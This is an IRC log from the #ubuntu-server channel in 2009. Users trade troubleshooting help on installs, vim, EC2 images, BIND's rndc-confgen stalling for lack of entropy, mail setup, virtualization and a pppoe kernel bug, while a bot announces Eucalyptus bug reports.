<JanC> I'd first look at dmesg & logfiles, maybe top, ...
<seyDoggy_> JanC: from cmd line?
<seyDoggy_> JanC: dmesg just dumped out a pile of jebberish (to me anyway)
<JanC> seyDoggy_: does it have something about errors at the end?
<joe-mac> JanC: and a cutover is < a reboot?
<joe-mac> if you have another server, of course
<JanC> joe-mac: of course, just meaning my way is not too bad, especially compared to a complete reinstall
<JanC> without another server to take over
<joe-mac> yea, i actually didn't see that above
<seyDoggy_> JanC: it's hard for me to say. further up the list is "Oops: kernel access of bad area..."
<JanC> seyDoggy_: bad disk area?
<seyDoggy_> JanC: just says "...bad area, sig:11 [#1]"
<seyDoggy_> i'm just going to kill it and try again.
<uvirtbot> New bug: #412664 in eucalyptus (main) "very hard to firewall eucalyptus securely" [Undecided,New] https://launchpad.net/bugs/412664
<Deeps> hi guys, i was wondering if there was an easy way to make a screen session that's attachable by any user, not just the one that created it?
<smoser> there is.
<Deeps> i could use an intermediary account to make the screen, have that account in a specific group, then have a script that can be called to alter the user's pty perms to include the group that the intermediary account is on to have perms to read/write/execute
<Deeps> but that seems a bit of a hack
<Deeps> smoser: any pointers?
<smoser> http://aperiodic.net/screen/multiuser
<smoser> there are some issues
<Deeps> yep, i see at the bottom
<Deeps> i'll give that a go, cheers
<smoser> there was another url i saw once that i follwed and had it working for me, but its been long ago
<Deeps> i realise this next question is completely outside the remit of this channel, as X is involved, however, i've recently discovered that my new fileserver box is actually quiet enough to sit by the TV and be used as a mediastation of sorts too
<Deeps> what i'm in the process of doing is using ssh/screen/mplayer with X and a minimal window manager (wm2) to control the X output
<Deeps> hense wanting multiuser screen, so my flatmates can easily ssh in and pause/rewind/close something that i've started, without needing root
<Deeps> wondering if anyone had any better suggestions for a lightweight media system- not too inclined to go the whole hog and get kubuntu-desktop/linuxmce going on
<Deeps> as this machine's primary role is to be a fileserver, despite being vastly overpowered for the job
<Keizer>  http://2.bp.blogspot.com/_rbeqbj-n1Z0/Skeak1qBGyI/AAAAAAAAAeM/3k_ntrDWmOw/s1600-h/ubuntu.png
<genii> Keizer: No need for trolling
<uvirtbot> New bug: #436447 in eucalyptus (main) "UI freeze exception for Eucalyptus 1.6 console" [Wishlist,Triaged] https://launchpad.net/bugs/436447
<seyDoggy_> I am having no luck here. I keep getting to different stages in this ppc install then I have to kill it for one reason or another.
<joe-mac> lmao Keizer
<Deeps> lol Keizer
<seyDoggy_> ok in guided partitioning, I want to use the whole disk. What is LVM for?
<joe-mac> LVM is for logical volumes
<joe-mac> chances are unless you'll be adding disks to this at a later date, you don't want the administration overhead, since you don't kbnow what it is
<seyDoggy_> joe-mac: yeah this is just for LAMP
<joe-mac> https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/422138    <--- anybody got an HTTPS 8.04 system they want to test this out on?
<uvirtbot> Launchpad bug 422138 in apache2 "Slow memory leak, seen on two machines, appears to be dupe of 224945 even after -updates" [Undecided,Incomplete]
<seyDoggy_> basic web serving, no need for LVM me thinks?
<joe-mac> seyDoggy_: probably not
<seyDoggy_> joe-mac: cool tnx
<Deeps> smoser: cheers, got that working now :)
<uvirtbot> New bug: #436199 in eucalyptus (main) "display admin URL on boot" [Wishlist,Triaged] https://launchpad.net/bugs/436199
<uvirtbot> New bug: #430877 in eucalyptus "describe volumes and describe snapshots times out occasionally" [Medium,Confirmed] https://launchpad.net/bugs/430877
<seyDoggy_> so far so good, I might have a web server by the days end. lol
<seyDoggy_> "Finishing the installation" nice!
<seyDoggy_> "BONG"
<seyDoggy_> welcome to yaboot
<seyDoggy_> loading
<seyDoggy_> ... :S
<seyDoggy_> crap pram battery is dead. clock won't set. will this be an issue?
<seyDoggy_> ubuntu login: yeah!
<seyDoggy_> adam@ubuntu:~$
<seyDoggy_> yeah
<seyDoggy_> well that was fun... now what
<zul> smoser: whats the bug number for the console bug again?
<smoser> bug 431103
<uvirtbot> Launchpad bug 431103 in linux-ec2 "ssh host key fingerprint no longer available in the console log" [Undecided,New] https://launchpad.net/bugs/431103
 * smoser thanks awesomebar
<zul> smoser: meric buckets
<zul> er...merci buckets :)
<uvirtbot> New bug: #429631 in eucalyptus (main) "Invalid S3_URL value in eucarc (dup-of: 429734)" [Low,Confirmed] https://launchpad.net/bugs/429631
<aubre> isn't it merci bukkits? :P
<axisys> I noticed none of my syslogd-listfiles rotated since Aug 16 .. is there a way I can find out why and how do I rotate them now ?
<zul> smoser: http://people.canonical.com/~chucks/0001-UBUNTU-SAUCE-ec2-Default-domU-console-to-tty.patch
<uvirtbot> New bug: #429781 in eucalyptus "snapshots created in 1.5 do not get imported to 1.6" [Wishlist,Incomplete] https://launchpad.net/bugs/429781
<smoser> thanks zul
<axisys> none of my logs have been rotated for more than a month.. here is an snippet http://pastebin.com/d34cc17cf
<axisys> anyidea why ? and how do I rotate them now?
<axisys> am I hitting a bug?
<disown> Hi. I am looking into different solutions of building a elastic computing cluster. I want to acheive something similar to a diskless PXE boot cluster, without having to own the hardware. Ec2 look good, but I wonder if it is "elastic" enough to fix a PXE-like scenario. Is adding servers completely automated, i.e will hostname etc be automatically updated when you spawn a new instance, or do...
<disown> ...you need to edit that manually after launching a new instance? Thanks
<axisys> how do I find all files in /etc dir that is not owned by root ?
<seyDoggy_> ok, so I have a web server now... got DNS, LAMP and ssh installed... any good docs on where I go from here?
<genii> seyDoggy_: https://help.ubuntu.com/9.04/serverguide/C/
<seyDoggy_> genii: tnx
<genii> seyDoggy_: You're welcome
<ruben23> hi
<ruben23> hi..are there application on linux that i can screen view the monitor of a multiple linux desktop screen on a server like computer
<ruben23> what i mean is an ubuntu desktop network
<ruben23> i have 25 ubuntu desktop client on my network and want to monitor its screen desktop real time on a single server client
<uvirtbot> New bug: #377364 in eucalyptus (main) "package eucalyptus-nc 1.5~bzr266-0ubuntu2 failed to install/upgrade: subprocess post-installation script returned error exit status 1" [High,Fix released] https://launchpad.net/bugs/377364
<seyDoggy_> ugh... I just simply want to serve the files I ftp'd? How do I alias the ftp directory to the www directory?
<uvirtbot> New bug: #399042 in eucalyptus (main) "package eucalyptus-nc 1.5~bzr266-0ubuntu2 failed to install/upgrade: subprocess post-installation script returned error exit status 1 (dup-of: 377364)" [Undecided,New] https://launchpad.net/bugs/399042
<uvirtbot> New bug: #399041 in eucalyptus (main) "package eucalyptus-nc 1.5~bzr266-0ubuntu2 failed to install/upgrade: subprocess post-installation script returned error exit status 1 (dup-of: 377364)" [Undecided,New] https://launchpad.net/bugs/399041
<ruben23> hi anyone have idea.?
<joe-mac> vnc?
<uvirtbot> New bug: #436835 in vm-builder (universe) "[PATCH] fix failure: TypeError: not enough arguments for format string" [Undecided,New] https://launchpad.net/bugs/436835
<ruben23> joe-mac:you used vnc..?
<CocaCola77> Is there a way to test that my old greybox pc is stable enough to run a set and forget ubuntu server?
<joe-mac> ruben23: i used to use ti when i did desktop leenuckz support every now and then when i couldn't fix something via SSH, so kinda rare. i sort of forget how the authentication worked, there was some hackery involved iirc
<joe-mac> CocaCola77: what kind of server?
<ruben23> joe-mac: probbaly this is just a LAN remote desktop viewing
<CocaCola77> joe-mac, ubuntu + samba (working as file server and nt4 like domain controller)
<ruben23> but ist multiple-real time view scrren
<ruben23> screen
<joe-mac> ruben23: i've seen a tool like that for RDP on windows, but never saw anything like that for linux. what exactly do you need tio accomplish?
<joe-mac> CocaCola77: only way you can tell is to put a load on it
<joe-mac> cpuburn etc
<CocaCola77> joe-mac, so just cpu, ram and hdd tests could tell me?
<joe-mac> that's all you can really do aside from a pilot of the server
<ruben23>  joe-mac: sample- i have 25 users- ubuntu desktop client and there is another client (servers as server) whihc can remote screen on all 25 desktop view its desktop screen or can open it at the same time, maybe just view purpose.
<joe-mac> i don't understand what or even how you would view 24 desktops at once
<ruben23>  joe-mac: maybe one at a time
<ruben23> or 2 desktop at a time
<ruben23> is it possible, its for monitoring purposes
<joe-mac> then use vnc
<joe-mac> only problem is, you'll want to tunnel it for security, requies a little hacking
<uvirtbot> New bug: #418409 in eucalyptus (main) "package eucalyptus-cloud 1.6~bzr452-0ubuntu3 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [High,Incomplete] https://launchpad.net/bugs/418409
<ruben23> joe-mac: no need for tunnel coz im just on the same network
<ruben23> local network
<ruben23> joe-mac: thanks for this
<ruben23> anyone have used tight vnc...?
<ruben23> for ubuntu desktop
<seyDoggy_> do you guys use pico to edit config files? is there something else?
<Hypnoz> vim
<boshhead> seyDoggy_: nano would be the editor you're looking for if you're looking for something like pico
<boshhead> seyDoggy_: but I use vim
<Hypnoz> ruben23: vnc is kinda flaky on ubuntu-desktop, not the easiest thing to get working
<ruben23> Hypnoz:..why..?
<Hypnoz> took me a lot of google searching just to kind of get it working right
<ruben23> Hypnoz:its just a plain vnc...? or any particular version.
<Hypnoz> for me it was partly because the login screen doesn't support vnc, so you have to be logged in. And the primary desktop that shows on your monitor isn't what vnc shows by default
<Hypnoz> it creates its own virtual desktop
<ruben23> ow
<ruben23> problem-im deploying it for a particular requirements
<Hypnoz> actually i think the desktop comes with a version of vnc already installed that you can use, somewhere in settings > remote desktop
<Hypnoz> if you enable remote desktop, it starts a vnc server
<ruben23> ok, but how do i connect to it..?using vnc client or vnc server..?
<qman__> seyDoggy_, I also use vim
<qman__> surprised no emacs people are here though
<Hypnoz> ruben23: check out System > Preferences > Remote Desktop
<Hypnoz> that might work well enough for you to use
<ruben23> ok ill try it thanks
<Hypnoz> and there is a vnc viewer already built into ubuntu desktop, otherwise they are free to download for windows clients
<ruben23> actually little confuse between ubuntu / windows desktop on my requirements.
<ruben23> local network desktop screen monitoring
<seyDoggy_> scuze my ignorance but how does one use vim from the command line?
<seyDoggy_> im admin through ssh
<qman__> vi
<uvirtbot> New bug: #423308 in eucalyptus (multiverse) "ec2-describe-instances sometimes shows the wrong IP" [Medium,Confirmed] https://launchpad.net/bugs/423308
<qman__> if you're using hardy or older, you might want to install the more complete version of vim though
<qman__> the default version doesn't let you use the arrow keys properly
<qman__> while in insert mode
<qman__> the newer releases include a better default vim though
<qman__> if you've never used vim/vi before, you're likely going to be very confused
<seyDoggy_> oh geeze vim crashed the file
<seyDoggy_> how do I get out of vim?
<joe-mac> hit esc a bunch of times
<joe-mac> then hit :q!
<qman__> press escape, :wq, enter
<qman__> err
<qman__> q!
<qman__> my bad
<qman__> wq is save
<seyDoggy_> oops, crash caused a swap file to be created
<seyDoggy_> better get the full version of vim
<qman__> in hardy and older the package is  vim-full
<seyDoggy_> oh, I just checked out "vim". what's "hardy"? I installed lts 8.1... is that hardy?
<genii> 8.04
<qman__> hardy is 8.04 lts
<qman__> I don't know about the 8.10 package
<genii> 8.10 is Intrepid
<genii> (and not long-term-support)
<seyDoggy_> i'll check out vim-full and see what happens
<qman__> I do know that jaunty (9.04) has a better vim by default
<seyDoggy_> still vi from cmd line for full vim?
<qman__> yes
<qman__> installing vim-full adds more features to vim
<seyDoggy_> tnx
<qman__> one of them is better arrow keys support
<qman__> among many others
<seyDoggy_> can you tell I am not a linux guy ;)
<qman__> you should definitely look up a crash course on vim, though
<qman__> the manual is massive and has way too much information just to learn how to use it
<seyDoggy_> eek maybe I'll stick with pico/nano
<qman__> it takes effort but it does have useful features
<qman__> so if you plan on spending a lot of time editing files, it's worth looking into
<qman__> one of the features I use most is regex string replacement
<seyDoggy_> i come from the textmate camp. don't know if I'm ready to wrap my head around a whole new way of doing things.
<uvirtbot> New bug: #411692 in eucalyptus (main) "stopping eucalyptus may lose the database" [Critical,Incomplete] https://launchpad.net/bugs/411692
<seyDoggy_> i am having a heck of a time getting apache to serve anything other the /var/www/
<kirkland> zul: ping
<kirkland> zul: https://bugs.edge.launchpad.net/ubuntu/+source/eucalyptus/+bug/436876
<uvirtbot> Launchpad bug 436876 in eucalyptus "Unzip should be considered" [Undecided,New]
<kirkland> zul: what system do you want unzip on?
<zul> kirkland: the node
<kirkland> zul: the node?
<kirkland> zul: hmm, i was thinking the cc
<kirkland> zul: why the node?
<kirkland> zul: to unzip your credentials?
<zul> isnt that were you run the eucatools
<zul> yes to unzip your credentials
<zul> since zip is already installed by default iirc
<kirkland> zul: you really shouldn't need to do anything on the -nc
<kirkland> zul: ever, really
<zul> ah ok
<kirkland> zul: -cc, yeah, perhaps
<kirkland> zul: cool
<uvirtbot> New bug: #409760 in eucalyptus (main) "fresh install of eucalyptus-cloud on karmic fails" [High,Fix released] https://launchpad.net/bugs/409760
<uvirtbot> New bug: #436876 in eucalyptus (main) "Unzip should be considered" [Undecided,New] https://launchpad.net/bugs/436876
<uvirtbot> New bug: #385660 in eucalyptus "In MANGED* modes, cannot access public IPs of VMs from the machine on which the CC is running" [Low,Fix committed] https://launchpad.net/bugs/385660
<joe-mac> jeez eucalyptus is getting a lot of qa today eh?
<genii> I was just thinking the same
<joe-mac> a colleague brought this stuff up to me the other day
<joe-mac> never heard of it before maybe two days ago...
<uvirtbot> New bug: #436041 in samba (main) "Access Denied but TSC confirms it should not be." [Undecided,Incomplete] https://launchpad.net/bugs/436041
<vraa> hello everyone, i finally am at my workstation, i was having an issue with my computer, it has 4 on board LAN ports (but only 1 is plugged in) during boot time it hangs at the "configuring network interfaces" portion, i press ctrl_alt+del and it skips it and boots up and things work fine though, how can i resolve so i can boot smoothly without user intervention
<vraa> or perhaps what direction should i head to, it runs ubuntu but i also have openssh server isntalled so i can control it using putty from my laptop
<joe-mac> vraa: what is in your /etc/network/interfaces file?
<vraa> http://pastebin.com/d633d03e
<uvirtbot> New bug: #364806 in eucalyptus "When maximum volume size is exceeded, the system should report a more helpful error" [Wishlist,Confirmed] https://launchpad.net/bugs/364806
<uvirtbot> New bug: #364902 in eucalyptus (main) "eucalyptus-cloud should depend on mail-transport-agent" [Medium,Fix committed] https://launchpad.net/bugs/364902
<uvirtbot> New bug: #365156 in eucalyptus (main) "-cloud and -cc init scripts don't set JAVA_HOME" [Medium,Invalid] https://launchpad.net/bugs/365156
<vraa> on the ubuntu desktop, if i right click network manager icon and go to edit connections, Auto eth2 doesnt show up, but auto eth3, auto eth0, and auto eth1 do show up.
<vraa> when i got o System -> Administration -> Network Tools -> i can see eth2 listed under the network devices section and it works fine (pulls IP using dhcp, it's my web server it works great, it's just doesn't restart / boot w/o user intervention)
<uvirtbot> New bug: #357999 in eucalyptus "configureNetwork is slow when instance IPs are not in DNS" [Low,Fix committed] https://launchpad.net/bugs/357999
<uvirtbot> New bug: #436896 in image-store-proxy (main) "Signature tests are disabled" [High,Confirmed] https://launchpad.net/bugs/436896
<uvirtbot> New bug: #338866 in eucalyptus (main) "eucalyptus-cc and nc init scripts do not clear /dev/shm before 'start' or after 'stop' " [Undecided,Fix released] https://launchpad.net/bugs/338866
<bjaspan> We are using the official Ubuntu 8.04 EC2 image.  We've noticed that the 32-bit image seems to crash and reboot early in the machine's life a fair percentage of the time (perhaps 10-20%).  We have not seen this with 64-bit images.
<bjaspan> Is it possible to get a crash dump of 8.04 on ec2? How else can we debug the cause?
<erichammond> bjaspan: The official Ubuntu 8.04 EC2 image is not recommended for use.
<bjaspan> Oh?
<erichammond> bjaspan: It has a number of serious bugs filed against it and the fixes have not been released as a new image.
<bjaspan> I know about the "no ssh access" bug (it sure is annoying).
<erichammond> bjaspan: Are you saying that you've been using that image for a while and the reboot problem just started?
<bjaspan> We've been using m1.larges for a while.  We just started testing m1.smalls, and the crash/reboot problem started immediately.
<erichammond> I see.  As far as I know that's a problem which others have not reported.
<erichammond> Are you running setup code when the instance starts?
<bjaspan> Yes, lots of it.
<erichammond> Have you been able to reproduce the reboot problem just running the image without any of your setup code running?
<bjaspan> Well, we're running puppet, which installs a bunch of packages, files, cron jobs, etc.
<bjaspan> We haven't specifically tried.  I'm perfectly prepared to believe that something we're running is triggering a crash... but that doesn't help much unless I can figure out what it is. :-)
<bjaspan> We're not tweaking the kernel or anything.
<erichammond> My assumption would be that something you're doing is interacting with a problem in the image/kernel and causing the reboot, but it sounds like it would be difficult for somebody else to reproduce unless you can reduce it to a simple test case.
<erichammond> The fact that it doesn't happen all the time will make it even more difficult for you to isolate, especially if it relates to startup timing :-\
<bjaspan> No kidding.
<bjaspan> That's why I asked about getting a crash dump.
<erichammond> Would it be possible to send the puppet output to a log file to help track down where the reboot happens?
<bjaspan> BTW, what is your role w.r.t. Ubuntu on EC2? I see your name associated with Alestic, but don't know what that is.
<bjaspan> Sure, we can get the puppet output.  The machine reboots, but when it comes back the root fs is still intact.
<bjaspan> Unfortunately puppet only tells you what it just finished doing, not what it is currently doing.  I was thinking of hacking it to log what it is about to execute.
<bjaspan> e.g. the last time I looked, the final thing puppet did before crashing was install emacs-nox, which seems an unlikely culprit.
<bjaspan> Hmmm.  Puppet has a debug mode we do not have enabled; that might help.
<erichammond> I'm just a guy who's been using Ubuntu on EC2 for a long time and decided to publish the images and build script I was using and they sort of became popular.  Now, Canonical has noticed EC2, so I'm working with them to migrate stuff over to the official releases.
<erichammond> I assume you've checked syslog for clues about the crash?
<erichammond> Isn't a reboot sort of a rare failure mode?  I would have thought that a crash/terminate would be more likely.
<bjaspan> Nothing helpful in syslog I could see.  Just puppet happily chugging away on its initial run, then "syslogd restart".  last sometimes reports "crash".
<bjaspan> e.g.
<bjaspan> root     pts/0        ip67-154-105-210 Tue Sep 22 19:34 - crash  (00:04)
<bjaspan> reboot   system boot  2.6.24-6-xen     Tue Sep 22 19:33 - 22:28 (3+02:55)
<bjaspan> reboot   system boot  2.6.24-6-xen     Tue Sep 22 19:30 - 19:32  (00:02)
<bjaspan> wtmp begins Tue Sep 22 19:30:17 2009
<erichammond> bjaspan: It might be worth opening a bug, though I'm not sure how much progress can be made without a reproducible test case.
<erichammond> https://bugs.launchpad.net/ubuntu/+filebug?no-redirect&field.tags=ec2-images
<erichammond> Include the AMI id and as much info as you can.
<bjaspan> will do, thanks
<erichammond> You might want to click "this bug affects me too" on https://bugs.launchpad.net/ubuntu/+bug/429120
<uvirtbot> Launchpad bug 429120 in ubuntu "ec2: Build new Ubuntu 8.04 Hardy AMIs" [Medium,New]
<erichammond> Now I'll get back to work and stop scrolling away your original question so somebody else can pitch in: "Is it possible to get a crash dump of 8.04 on ec2?"
<bjaspan> Thanks!  BTW, in case this rings any bells: We're mounting a FUSE filesystem with glusterfs.
<zul> hey jjohansen
<jjohansen> hi zul
<zul> mmmmmm....ice cream with sprinkles
<Hypnoz> can someone help me change where dhcp logs. its flooding my /var/log/messages
<Hypnoz> every BMC adapter on every server in my dc is requesting a dhcp address cause thats how its setup by default in the bios, even though we didn't wire up the BMC controllers
<Hypnoz> From dhcpd.conf
<Hypnoz> # Use this to send dhcp log messages to a different log file (you also
<Hypnoz> # have to hack syslog.conf to complete the redirection).
<Hypnoz> log-facility local7;
<Hypnoz> anyone know what I do to syslog.conf to complete this?
<uvirtbot> New bug: #436932 in eucalyptus (main) "euca_conf should assume --local-sync if the given IP is local" [Medium,Triaged] https://launchpad.net/bugs/436932
#ubuntu-server 2009-09-26
<Hypnoz> nvm i figured it out
<zul> smoser: ping
<Hypnoz> every time i see that name i kinda get in the mood for a s'more
<maek> does ubuntu come with an mta?
<maek> I feel crazy because I could have sworn I turned exim off
<zul> erichammond: can you try the kernel and ramdisk listed in bug #431103 and see if you get the ssh keys when you do an ec2-get-console-output
<uvirtbot> Launchpad bug 431103 in linux-ec2 "ssh host key fingerprint no longer available in the console log" [High,New] https://launchpad.net/bugs/431103
<erichammond> zul: looking
<zul> thanks
<erichammond> zul: What AMI should I use?
<zul> erichammond: the regular alpha6 i386 AMI
<erichammond> ok
<erichammond> Trying ami-fa658593 + aki-305dbd59 + ari-365dbd5f
<erichammond> zul: wow, it took 5 minutes to get out of "pending"
<erichammond> Hopefully it's just because the kernel+ramdisk are not cached everywhere yet.
<erichammond> On second thought, those should not be very big, right?
<zul> they shouldnt
<erichammond> zul: Results: Yes, the console output includes the host ssh key fingerprints.
<zul> erichammond: excelent
<erichammond> Sorry, Jaunty keeps losing track of my Verizon USB modem.  I plug it in to the other side of the laptop and it finds it again, then loses it later, at which point I have to reboot.
<uvirtbot> New bug: #431832 in eucalyptus (main) "euca_conf --register-sc returns success even though it fails" [Medium,Triaged] https://launchpad.net/bugs/431832
<uvirtbot> New bug: #365141 in eucalyptus "euca_conf: inelegant retrieval of eucalyptus' $HOME" [Low,Fix released] https://launchpad.net/bugs/365141
<uvirtbot> New bug: #415484 in eucalyptus "unable to save login details for web UI" [Wishlist,Confirmed] https://launchpad.net/bugs/415484
<newz2000> Is this a good place to get help with xen related issues?
<newz2000> (running xen on ubuntu server of course)
<giovani> newz2000: #xen would be more appropriate
<newz2000> Not too many helpful people online the last couple days in there
<newz2000> I have a 64bit server that does not support virtualization cpu instructions running Jaunty
<newz2000> Is there a stock kernel that supports xen dom0?
<giovani> did you not read the Xen page on ubuntu's site?
<newz2000> yes, it's pretty out of date
<giovani> it is?
<newz2000> "This guide is written for Feisty"
<newz2000> https://help.ubuntu.com/community/Xen#Installation
<giovani> did you read the part before that mentioned jaunty?
<giovani> I didn't say to read the whole guide -- but read the introduction
<giovani> Xen as a supported virtualization solution isn't highest on Ubuntu's list
<newz2000> This one sentence is pretty meaningless by itself
<giovani> like most distros -- KVM is the virtualization of chocie
<newz2000> kvm needs hardware virtualization support I believe
<newz2000> I need paravirtualization
<giovani> no, KVM offers paravirt
<giovani> but like it or not
<giovani> KVM is the center of attention
<newz2000> KVM offers paravirt?
<giovani> yep
<giovani> anyway
<giovani> use Xen -- that's fine -- but don't expect a lot of support
<newz2000> I'm interested in exploring a kvm solution
<newz2000> The kvm docs I read said it needed VT which I don't have
 * Debolaz would recommend looking at proxmox, a Debian based Linux distribution for managing KVM / OpenVZ instances.
<giovani> then you clearly haven't done the most basic of google searches -- i.e. "kvm paravirtualization"
<giovani> I'd suggest you buy a real processor though, that does offer VT
<newz2000> oh, yeah, that's a basic google search
<giovani> they're not expensive
<newz2000> So, kvm installation page says "To run KVM, you need a processor that supports virtualisation"
<newz2000> https://help.ubuntu.com/community/KVM/Installation
<bjaspan> seen webchick?
<maek> can anyone point me in the direction of documents on how to configure sendmail or any mta to just send mail, I just need to sendmail from a few php scripts but im a bit lost. thanks
<bjaspan> oops, sorry, wrong channel
<uvirtbot> New bug: #437025 in mysql-dfsg-5.1 (main) "package mysql-server-5.1 5.1.37-1ubuntu4 failed to install/upgrade: subprocess new pre-removal script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/437025
<qman__> maek, postfix and exim are the supported mail servers on ubuntu
<maek> qman__: either one better/easier for a mta noob. I just need to send mail from a few php applications that use the "sendmail" stuff built into php
<maek> I assume postfix and exim provied the /usr/sbin/sendmail like most mtas?
<maek> qman__: also, thakns.
<maek> thanks, even.
<qman__> I don't know much about exim, I use postfix myself
<qman__> I've not done a configuration like that, but the dpkg installer helps you set it up
<maek> oh ok. ill give that a go
<qman__> and I know that postfix can be configured as a drop-in replacement for sendmail
<ScottK> Most of the Ubuntu docs are postfix centric too.
<rags> I have a Hardy server with two pppoe connections, now recently the server just hangs from time to time...when I connect to the consle this message keeps loopin on the screen "unregister_netdevice: waiting for ppp0 to become free. Usage count = 1". It's a known bug in the 2.6.24 kernel.
<rags> Wht can I do to get a resolution...
<ScottK> I don't imagine it's a new bug in the kernel.  I'd imagine figure out what else changed and put it back.
<rags> most solutions recommend a downgrade...
<ScottK> Well it wasn't happening to you before, so somehting must have changed.
<rags> ScottK: Yes...It's more frequent now actually....difficult to trace the problem though...
<ScottK> Good luck.  I don't have any suggestions more useful than that.
<artillerytx> how long is rndc-confgen supposed to take?
<jmarsden> artillerytx: It is nearly instant.
<artillerytx> jmarsden: ahh mine takes quit a while to generate
<artillerytx> I wonder whats causing that
<mushroomblue> is Karmic useable enough on a dev server, or is it still going to break every other update?
<jmarsden> artillerytx: Testing shows it takes 7 milliseconds here, using time sudo rndc-confgen -a :)
<artillerytx> jmarsden: ahh i used "rndc-confgen -b 512 | grep -m 1 "secret" | cut -d '"' -f 2"
<artillerytx> jmarsden: some tutorial told me to use that one
<artillerytx> its been about 5 mins
<artillerytx> still nothing
<jmarsden> Hmmm.  -a is the "do it automatically" switch that I have always used.
<artillerytx> let me try that one then
<jmarsden> Do you have enough randomness for it .. maybe it is hung waiting for entropy from /dev/random or something like that?
<artillerytx> that could be it
<artillerytx> how do i fix the /dev/random
<jmarsden> I'm not sure, I've never seen that issue in Ubuntu, I just remembered it from years ago when I had a server that would sometimes stall doing crypto stuff.. turned out it was a lack of entropy.  Google it and see if you find something relevant?
<artillerytx> k i will try googling rndc-confgen /dev/random
<artillerytx> people are suggesting i buy some device to make it more random ?? that seems odd
<jmarsden> That's an expensive solution for people with very high security needs; it's probably not what you are looking for.
<artillerytx> haha yeah no i just have a little web server
<artillerytx> running like 4 websites
<jmarsden> Have you actually checked that the process concerned is in fact stalled reading from /dev/random or /dev/urandom ?
<artillerytx> I have no how can i check that
<artillerytx> Im still learning about ubuntu-server
<jmarsden> Not a Ubuntu server specific issue.  How in general would you check what files or devices a process has open?
<artillerytx> top?
<artillerytx> usually the activity monitor which would be top i guess in ubuntu
<jmarsden> Interesting idea, but I don't think you can ask top "who has file X open"...
<jmarsden> Try fuser or lsof
<artillerytx> would it be fuser -m
<jmarsden> man fuser and read the synopsis again.  I'd try just   fuser /dev/random   or   fuser/dev/urandom  to see which processes have those devices open.
<artillerytx> well for those commands it gives me 3 rows of numbers and urandom only has one
<jmarsden> Is one of those PIDs the PID of your rndc-confget process?
<jmarsden> *rndc-confgen
<artillerytx> it looks like its PID is 26025 which isn't one of the randosm
<artillerytx> wait no there it is
<artillerytx> yeah its using one of them
<jmarsden> OK, so then most likely that isn't the issue; it's not waiting on either of those devices... oh... OK.
<jmarsden> So it *is* waiting on one of them
<artillerytx> yeah
<artillerytx> 25504
<artillerytx> k got it
<artillerytx> it finally worked
<artillerytx> how can i see how long it took ?
<jmarsden> Do it again with time at the front.   time sudo rndc-confgen -a    (which I said earlier, I think)
<artillerytx> alright will do
<jmarsden> But exactly how long it takes isn't really important to know, is it?  Why is that valuable to know?
<artillerytx> just curious
<jmarsden> OK :)
<jmarsden> You'd do better to feed /dev/random some data, I think :)
<artillerytx> :-( not sure how i would do that
<artillerytx> k it took 2m35.070s
<artillerytx> that seems long
<jmarsden> You seriously need to read and understand something like http://tldp.org/LDP/intro-linux/html/intro-linux.html
<jmarsden> So you have a grasp of Linux fundamentals including shell redirection.
<jmarsden> cat /etc/hosts |sudo tee -a /dev/random
<jmarsden> Might be a start.
<artillerytx> yea
<jmarsden> Then try    time sudo rndc-confgen -a    again and see if it is any quicker.
<artillerytx> seems like its taking longer now
<jmarsden> Then that didn't help!
<artillerytx> still sitting
<jmarsden> I don't have time/energy to troubleshoot this in depth now... I dislike suggesting it, but is this a server you can reboot without major consequences?  If so, a reboot might get you some more entropy as part of the boot process.
<artillerytx> yeah i can reboot
<artillerytx> ehh whatever it creates the new key thats all that matters
<jmarsden> So you could try that; although of course you do now have a working rndc.key, or should have when this corrent rndc-confgen run finishes ... you only need to do it once, really.
<jmarsden> Right.
<jmarsden> But if something else needs entropy on your machine (for an SSL connection or whatever) it too may stall.  So this probably isn't something to ignore forever.
<artillerytx> yeah
<artillerytx> how can i check that the key is working properly ?
<jmarsden> Use rndc :)
<artillerytx> rndc reload bind9 returns - rndc:connection to remote host closed blah blah
<artillerytx> "=)
<artillerytx> sad face i mean
<jmarsden> Did you restart bind after the last time you ran rndc-confgen ?
<artillerytx> no i haven't /etc/init.d/bind9 restart
<jmarsden> Sure.  Bind won't read the newly written config file until you restart it.
<artillerytx> :-( same thing man this sucks
<jmarsden> What did you do to your bind config files?
<jmarsden> This works out of the box.
<artillerytx> i really haven't done anything
<artillerytx> well besides i guess i added one of those lines to the named.conf like the tutorials tell me to
<jmarsden> what line and why did you add it?  What does it do?
<artillerytx> - http://pastebin.com/d5f6bea01
<artillerytx> thats the named.conf file
<artillerytx> line 41 is where i added the codes
<jmarsden> And what does the stuf you added do?  Why did you add it?
<artillerytx> i was following a tutorial
<jmarsden> Why???!  You just broke it.
<jmarsden> What were you trying to actually do
<artillerytx> that was from awhile ago
<artillerytx> Well for some reason everytime i restart bind with the /etc/init.d/bind9 restart it gives me the rndc error and i wanted to fix it
<artillerytx> so i just googled the error and found a tutorial
<jmarsden> So you got an error even before you made any changes at all?
<artillerytx> I've had the error and have yet to figure out what was wrong
<jmarsden> OK... but are you saying that out of the box, as soon as you installed bind and started it for the first time, rndc failed?
<artillerytx> yeah im pretty sure it didn't work
<jmarsden> Hmm.  OK.  I'll kill my bind setup here and reinstall from scratch and see what happens...
<artillerytx> well maybe i should just do that then
<artillerytx> save my .hosts files and reinstall
<jmarsden> Wait... OK... I'm seeing the same thing, on Ubuntu 9.04.  It did not used to do that... I suspect a bug in a recent update to bind, or something like that...
<artillerytx> Okay cool
<artillerytx> yeah i have 9.04
<artillerytx> Okay so im not totally crazy
<artillerytx> or stupid
<jmarsden> OK, there may be something odd about stopping named.  Try   sudo killall named    and then    sudo service bind9 start
<artillerytx> k done
<artillerytx> started fine
<artillerytx> rndc is still giving those same errors
<artillerytx> jmarsden: any luck ?
<jmarsden> sorry, ob phone...
<artillerytx> no prob
<rpinto> hi channel
<rpinto> im facing a problem wiht my ubunt LTS server8.04
<rpinto> the server hangs
<rpinto> when i checked the logs, the following error is shown
<rpinto> unregister_netdevice: waiting for ppp0 to become free. usage count =1+bug patch
<rpinto> ive read that this is a kernel bug
<rpinto> any patch for this?
<rpinto> this is the error:>	unregister_netdevice: waiting for ppp0 to become free. usage count =1
<rpinto> i have two pppoe connections
<rpinto> and the server is the gateway
<rpinto> i read tat this usually happens when there r two pppoe connections
<rpinto> can some1 guid me on this?
<jmarsden> rpinto: No idea, I suggest you search for details on the kernel bug and hope there is a patch for it.
